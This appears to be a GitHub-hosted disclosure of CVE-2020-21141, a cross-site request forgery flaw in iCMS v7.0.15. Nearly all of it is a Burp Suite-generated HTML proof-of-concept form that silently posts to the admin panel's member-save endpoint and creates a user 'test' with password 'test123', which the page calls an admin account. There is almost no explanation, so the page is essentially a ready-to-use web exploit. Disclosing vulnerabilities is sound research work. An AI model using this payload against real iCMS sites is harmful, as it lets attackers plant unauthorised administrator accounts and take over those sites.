Headline
CVE-2020-21141: just_for_fun/ICMS CSRF at master · hxcc/just_for_fun
iCMS v7.0.15 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admincp.php?app=members&do=add.
Permalink
Cannot retrieve contributors at this time
url:http://example.com/admincp.php?app=members&do=add
add a admin name was test
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('’, '’, ‘/’)</script>
<form action="http://icms7.idreamsoft.com/admincp.php?app=members&do=save&frame=iPHP&CSRF_TOKEN=4c28f0f8QKQNRAGZMLvRszVV4M4YP-Z9LcQw5n4jlHvq8TB75xVPVxXEAm-CemjoSPieJrYFxlq0J5VblFF1FY5qJah0_jlDDAKiTXs" method="POST">
<input type="hidden" name="uid" value="0" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="gid" value="1" />
<input type="hidden" name="uname" value="test" />
<input type="hidden" name="pwd" value="test123" />
<input type="hidden" name="nickname" value="test" />
<input type="hidden" name="realname" value="" />
<input type="hidden" name="info[QQ]" value="" />
<input type="hidden" name="info[blog]" value="" />
<input type="hidden" name="info[year]" value="" />
<input type="hidden" name="info[month]" value="" />
<input type="hidden" name="info[day]" value="" />
<input type="hidden" name="info[from]" value="" />
<input type="hidden" name="info[sign]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>